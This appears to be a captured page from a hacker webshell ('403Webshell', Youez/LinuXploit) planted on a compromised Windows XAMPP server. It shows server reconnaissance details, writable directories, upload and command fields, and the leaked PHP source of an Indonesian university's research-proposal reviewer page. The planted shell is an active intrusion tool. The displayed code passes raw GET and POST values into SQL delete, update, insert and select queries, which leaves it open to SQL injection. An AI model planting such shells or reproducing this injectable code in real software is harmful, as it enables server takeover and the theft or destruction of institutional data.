403Webshell
Server IP : 101.255.104.117  /  Your IP : 101.255.104.117
Web Server : Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
System : Windows NT DESKTOP-5B8S0D4 6.2 build 9200 (Windows 8 Professional Edition) i586
User : user ( 0)
PHP Version : 5.6.38
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  D:/xampp182/htdocs/silppm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : D:/xampp182/htdocs/silppm/RekapReviewerPengabdian.inc.php
<?php
if(isset($_SESSION["user-profile"]) && strlen($_SESSION["user-profile"]) > 0) {
	$profile = $_SESSION["user-profile"];
	$nm = $_SESSION["user_fullname"];
	$ids = $_SESSION["user-id"];
}

$id = "";
$judul = "";
$hp = "";
$skim = "";
$buton = "Simpan";
$proposal = "-";
$topik = "-";
$tgl_usulan = "-";
$biaya = "-";
$skema = "-";
$periode = "-";
$skim = "-";
$nama = "-";
$id_peneliti = "-";
$struktural = "-";
$prodi = "-";

if(isset($_GET["deleteID"])) {
    $sql = "delete from usulan_penelitian where id = ".$_GET["deleteID"];
    if (mysqli_query($conn, $sql)) {
        echo "<script>window.alert('Data Sudah Terhapus');</script>";
    } else {
        echo "Error: " . $sql . "<br>" . mysqli_error($conn);
    }
}

if(isset($_GET["editID"])) {
	$sql = "SELECT * FROM usulan_penelitian where id = ".$_GET["editID"]." order by id desc";
	$result = mysqli_query($conn, $sql);

	if(mysqli_num_rows($result) > 0) {
        while($row = mysqli_fetch_assoc($result)) {
            $id = $row['id'];
            $judul = $row['judul'];
            $tgl_usulan = $row['tgl_usulan'];
            $skim = $row['skim'];
            $id_peneliti = $row['id_peneliti'];
            $prodi = $row['prodi'];
            $periode = $row['periode'];
            $biaya = $row['biaya'];
            $topik = $row['topik'];
            $proposal = $row['proposal'];
            $buton = "Koreksi";
            $buton = "Koreksi";
        }
    }
}

if(isset($_GET["setaktif"])) {
    $setz = mysqli_query($conn, "update usulan_penelitian set aktif = 0");
    $sql = "update usulan_penelitian set aktif = 1 where id = ".$_GET["setaktif"];
    if (mysqli_query($conn, $sql)) {
        echo "<script>window.alert('Set Aktif');</script>";
    } else {
        echo "Error: " . $sql . "<br>" . mysqli_error($conn);
    }
}

if(isset($_POST["Simpan"]) || isset($_POST["Koreksi"])) {
	if(isset($_POST["tgl_usulan"])) $tgl_usulan = $_POST["tgl_usulan"];
	if(isset($_POST["skim"])) $skim = $_POST["skim"];
	if(isset($_POST["judul"])) $judul = $_POST["judul"];
	if(isset($_POST["id"])) $id = $_POST["id"];
	if(isset($_POST["periode"])) $periode = $_POST["periode"];
	if(isset($_POST["skema"])) $skema = $_POST["skema"];
	if(isset($_POST["biaya"])) $biaya = $_POST["biaya"];
	if(isset($_POST["topik"])) $topik = $_POST["topik"];
	if(isset($_POST["proposal"])) $proposal = $_POST["proposal"];
	if(isset($_POST["id_peneliti"])) $id_peneliti = $_POST["id_peneliti"];
	if(isset($_POST["prodi"])) $prodi = $_POST["prodi"];

	$tbField[0] = "judul";
	$tbField[1] = "tgl_usulan";
	$tbField[2] = "skim";
	$tbField[3] = "periode";
	$tbField[4] = "skema";
	$tbField[5] = "biaya";
	$tbField[6] = "topik";
	$tbField[7] = "proposal";
	$tbField[8] = "id_peneliti";
	$tbField[9] = "prodi";

	$tbIsi[0] = "'".$judul."'";
	$tbIsi[1] = "'".$tgl_usulan."'";
	$tbIsi[2] = "'".$skim."'";
	$tbIsi[3] = "'".$periode."'";
	$tbIsi[4] = "'".$skema."'";
	$tbIsi[5] = "'".$biaya."'";
	$tbIsi[6] = "'".$topik."'";
	$tbIsi[7] = "'".$proposal."'";
	$tbIsi[8] = "'".$id_peneliti."'";
	$tbIsi[9] = "'".$prodi."'";

	if(isset($_POST["Simpan"])) {
		$nmField = compile_array($tbField);
		$isiField = compile_array($tbIsi);

        $sql = "insert into usulan_penelitian (".$nmField.") values (".$isiField.")";

		$notif = $ssm;
	}
	if(isset($_POST["Koreksi"])) {
		$compileSet = compile_array2($tbField,$tbIsi);
        $sql = "update usulan_penelitian set ".$compileSet." where id = ".$id;

        $notif = $sum;
	}

    if (mysqli_query($conn, $sql)) {
        echo "<script>window.alert('".$notif."');</script>";
    } else {
        echo "Error: " . $sql . "<br>" . mysqli_error($conn);
    }
}
?>

<form class="user" action="dashboard.php?Penelitian" accept-charset="utf-8" method="post">
<div class="container-fluid">

<!-- Page Heading -->

                    <!-- DataTales Example -->
                    <div class="card shadow mb-4">
                        <div class="card-header py-3">
                            <h6 class="m-0 font-weight-bold text-primary">Rekap Reviewer</h6>
                        </div>
                        <div class="card-body">
                            <div class="table-responsive">
                                <table class="table table-bordered" id="dataTable" width="100%" cellspacing="0">
                                    <thead>
                                        <tr>
                                            <th>NO</th>
                                            <th>Tanggal</th>
                                            <th>Judul</th>
                                            <th>Hasil Penelitian</th>
                                            <th>Nilai</th>
                                            <th>Reviewer</th>
                                        </tr>
                                    </thead>
                                    <tfoot>
                                        <tr>
                                            <th>NO</th>
                                            <th>Tanggal</th>
                                            <th>Judul</th>
                                            <th>Hasil Penelitian</th>
                                            <th>Nilai</th>
                                            <th>Reviewer</th>
                                        </tr>
                                    </tfoot>
                                    <tbody>
                                        <?php
                                        if($profile == "REVIEWER") {
    										$sql = "SELECT * FROM usulan_pengabdian a left join user_login b on a.reviewer = b.user_id where a.reviewer = ".$ids." order by id desc";
                                        }else if($profile == "ADMIN") {
    										$sql = "SELECT * FROM usulan_pengabdian a left join user_login b on a.reviewer = b.user_id order by id desc";
                                        }else{
                                            $nidn2 = substr($nidn,1,20);
    										$sql = "SELECT * FROM usulan_pengabdian a left join user_login b on a.reviewer = b.user_id where b.user_name like '%".$nidn."%' or b.user_name like '%".$nidn2."%' order by id desc";
    										//$sql = "SELECT * FROM usulan_pengabdian a left join user_login b on a.reviewer = b.user_id where a.id_peneliti = ".$ids." order by id desc";
                                        }
										$result = mysqli_query($conn, $sql);
										$no = 0;

										if(mysqli_num_rows($result) > 0) {
											while($row = mysqli_fetch_assoc($result)) {
                                        ?>
                                        <tr>
                                            <td><?php echo $no = ($no+1);?></td>
                                            <td><?php echo $row['tgl_usulan'];?></td>
                                            <td><?php echo $row['judul'];?></td>
                                            <td><?php echo $row['komentar'];?></td>
                                            <td><?php echo $row['nilai'];?></td>
                                            <td><?php echo $row['user_fullname'];?></td>
                                        </tr>
                                        <?php
        }
    }
                                        ?>
                                    </tbody>
                                </table>
								<hr>
                                </div>
                            </div>
                        </div>
                    </div>
</form>


Youez - 2016 - github.com/yon3zu
LinuXploit